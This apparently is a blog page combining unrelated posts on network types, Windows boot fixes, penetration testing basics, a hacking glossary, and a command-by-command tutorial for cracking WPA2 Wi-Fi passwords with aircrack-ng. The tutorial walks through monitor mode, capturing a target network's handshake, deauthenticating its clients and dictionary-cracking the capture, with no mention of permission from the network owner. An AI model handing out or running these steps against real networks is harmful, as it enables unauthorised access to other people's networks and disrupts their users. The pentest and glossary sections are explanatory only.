Sunday 22 January 2023

What is LAN , MAN & WAN l?

 • What is LAN? 

A LAN (Local Area Network) is a network confined to limited space, such as a building or floor. If you have multiple computers in your home or office, you have a Local Area Network (LAN). A LAN is usually under the control of the company or entity that requires its use. A LAN can be tiny or huge, with one or thousands of users and devices in an office or school. 

A LAN connects devices in a single, constrained area, regardless of size. A WAN or MAN, on the other hand, covers a greater geographic area. In addition, some WANs and MANs link several LANs. 

• What is WAN? 

A WAN (Wide Area Network) is a network mostly provided by a third-party Internet Service Provider that connects many local area networks (LANs) geographically separated. ONE EXAMPLE IS an MPLS Network (offered by a telecommunications provider) connecting company headquarters in New York, Boston, and Los Angeles. The Internet is the most significant WAN.

Why is my computer stuck on loading screen?

 1. Why is my computer stuck on loading screen?


This can happen after a driver update, some graphics issue, and sometimes even after a major Windows 10 Update or other problems. At this time, you can enter the Safe Mode, do nothing, and then reboot your computer.

2. How do you fix a stuck screen on a loading laptop?

If your Laptop stuck at loading screen (circles spin but no logo), follow steps below to fix.

Shut down your laptop > boot into system recovery (press f11 repeatedly as soon as you press the power button) > then, select "Troubleshoot"> "Advanced options"> "System Restore". Then, follow on-screen instructions to finish.

3. How do I fix Windows 7 stuck on loading screen?

To fix Windows 7 stuck at starting windows screen problem, you can try to change your computer memory or reinstall the computer memory. And then, restart the computer in Safe Mode. In Safe Mode, press Win + R keys to run MSCONFIG and press OK. Here, you should select the clean boot option by unchecking all the options under Selective Startup. At last, press "Apply" and restart Windows 7 in normal mode.

Cracking WPA2 wifi password using aircrack-ng Kali linux 2

 Cracking WPA2 wifi password using aircrack-ng Kali linux 2

Cracking WPA2 wifi password is not really an easy thing to do,
no you can't crack it with a click and there is no software that will give you the password without some hard work ...
don't run away still you can crack it  with few steps here :) and we will do it using aircrack-ng


requirements: To crack a wpa2-psk encrypted wifi password using aircrack-ng

1- Kali Linux or any Linux system with aircrack-ng installed
  a- if you don't have aircrack-ng suite get it by this commend in terminal
sudo apt-get install aircrack-ng
2- a wireless network adapter that support monitor mode like
  a- Alfa 2W AWUS036NH
  b- Alfa AWUS036H
  c- wifiy-city 56G
  d- and you can check this page here for card compatibility compatibility drivers
3- a word list comprising of all the possible different combination of pass-phrases

Now let's get to work
i will be using wifiy-city 56G card on Kali linux 2 sana

1) open up your terminal as root and type
ifconfig
this will show you all the networking interfaces connected to your device.


if your wireless network adapter is working fine you should see the " wlan0 " the name may change if you have more then one connected wireless adapter.

2) now to start monitor mode type
airmon-ng start wlan0 
'airmon-ng' is a traffic monitoring tool
‘wlan0’ is your wireless interface

after this commend we started the monitor mode
as it's seen the monitor mode is working under wlan0mon , so this is your card name for now
in the red area a list of process id’s that cause trouble during the process so kill those processes by typing
kill <pid>
 in my case
kill 743 898 1070 1071 1081 
 now type ifconfig and this will show the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 .

3) to show list of available WiFi network type
airodump-ng wlan0mon


airodump-ng is a wifi packets capturing tool
wlan0mon is my  monitoring interface
airodump-ng  will start capturing all packets and from the captured packets
select your target and note its ‘bssid’ (bssid = base service set identifier) and channel
then stop the capture using “cntrl+c“.

4) Start capturing the packets of your target network
type the following command
airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon 
i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 


 this will start the capturing of packets.
and if you get the handshake you wont need the aireplay command...
if you don't get the handshake yet
while the capturing of packets goes on, open a new terminal as root and type
aireplay-ng -0 0 -a <bssid> mon0
aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
-0 = number associated for deauthentication,
0 = deauth count,
-a = bssid) here we are trying to send a deauthentication request.
In my case the command looks like
aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon


after few seconds stop it using cntrl+c.
now after we have successful captured the wpa handshake

5) Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and files.
Select the file with “.cap“extension and type the following command
aircrack-ng -w <full location of the word list> <name of the file>
aircrack-ng is a tool that helps in cracking the password
In my case the command looks like
aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
For the Wordlist Check this Post Best Password dictionary
Now it starts finding suitable passphrase.

and now all you have to do is wait till you see the lovely news ( KEY Found  ( your key is here ;) ).


all Step in few lines
1) airodump-ng wlan0mon
2) airodump-ng -c 9 -w wifi  --bssid C4:6E:1F:F6:34:B8 wlan0mon
3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

have a great day :)
you can check the video in youtube and see how its working and cracking 
https://www.youtube.com/watch?v=hZEpHLZkIJI

Best wifi Adapter to work with Aircark 
                Here is a list of Wireless cards that support injection and monitor mode
1. Alfa AWUS036NHA –(2.4GHz) http://amzn.to/1RzUNKR
2. TP-LINK TP-WN722N $13.44 http://amzn.to/1SMe8b1
3. AWUS036H – (2.4GHz) $26.99 http://amzn.to/1UDrZnr
4.TP-Link WN722N (2.4GHz) $18.97 http://amzn.to/1UDsii4
5.D-Link DWA-110 http://amzn.to/1RXovvp

🔰Penetration Testing🔰

 🔰Penetration Testing🔰

  

Penetration Testing is a method that many companies follow in order to minimize their security breaches. This is a controlled way of hiring a professional who will try to hack your system and show you the loopholes that you should fix.


Before doing a penetration test, it is mandatory to have an agreement that will explicitly mention the following parameters −


>what will be the time of penetration test,


>where will be the IP source of the attack, and


>what will be the penetration fields of the system.


Penetration testing is conducted by professional ethical hackers who mainly use commercial, open-source tools, automate tools and manual checks. There are no restrictions; the most important objective here is to uncover as many security flaws as possible.


⭕️Types of Penetration Testing


1️⃣Black Box − Here, the ethical hacker doesn’t have any information regarding the infrastructure or the network of the organization that he is trying to penetrate. In black-box penetration testing, the hacker tries to find the information by his own means.


2️⃣Grey Box − It is a type of penetration testing where the ethical hacker has a partial knowledge of the infrastructure, like its domain name server.


3️⃣White Box − In white-box penetration testing, the ethical hacker is provided with all the necessary information about the infrastructure and the network of the organization that he needs to penetrate.


4️⃣External Penetration Testing − This type of penetration testing mainly focuses on network infrastructure or servers and their software operating under the infrastructure. In this case, the ethical hacker tries the attack using public networks through the Internet. The hacker attempts to hack the company infrastructure by attacking their webpages, webservers, public DNS servers, etc.


5️⃣Internal Penetration Testing − In this type of penetration testing, the ethical hacker is inside the network of the company and conducts his tests from there.


Penetration testing can also cause problems such as system malfunctioning, system crashing, or data loss. Therefore, a company should take calculated risks before going ahead with penetration testing. The risk is calculated as follows and it is a management risk.

⚠️List of terms used in the field of hacking.⚠️

 ⚠️List of terms used in the field of hacking.⚠️


🚩Adware − Adware is software designed to force pre-chosen ads to display on your system.


🚩Attack − An attack is an action that is done on a system to get its access and extract sensitive data.


🚩Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections.


🚩Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate.


🚩Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks.


🚩Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords, over and over again, until it gets in.


🚩Buffer Overflow − Buffer Overflow is a flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.


🚩Clone phishing − Clone phishing is the modification of an existing, legitimate email with a false link to trick the recipient into providing personal information.


🚩Cracker − A cracker is one who modifies the software to access the features which are considered undesirable by the person cracking the software, especially copy protection features.


🚩Denial of service attack (DoS) − A denial of service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.


🚩DDoS − Distributed denial of service attack.


🚩Exploit Kit − An exploit kit is software system designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it and exploiting discovered vulnerabilities to upload and execute malicious code on the client.


🚩Exploit − Exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to compromise the security of a computer or network system.


🚩Firewall − A firewall is a filter designed to keep unwanted intruders outside a computer system or network while allowing safe communication between systems and users on the inside of the firewall.


🚩Keystroke logging − Keystroke logging is the process of tracking the keys which are pressed on a computer (and which touchscreen points are used). It is simply the map of a computer/human interface. It is used by gray and black hat hackers to record login IDs and passwords. Keyloggers are usually secreted onto a device using a Trojan delivered by a phishing email.


🚩Logic bomb − A virus secreted into a system that triggers a malicious action when certain conditions are met. The most common version is the time bomb.


🚩Malware − Malware is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other malicious programs.


🚩Master Program − A master program is the program a black hat hacker uses to remotely transmit commands to infected zombie drones, normally to carry out Denial of Service attacks or spam attacks.


🚩Phishing − Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking emails, in an attempt to gather personal and financial information from recipients.


🚩Phreaker − Phreakers are considered the original computer hackers and they are those who break into the telephone network illegally, typically to make free longdistance phone calls or to tap phone lines.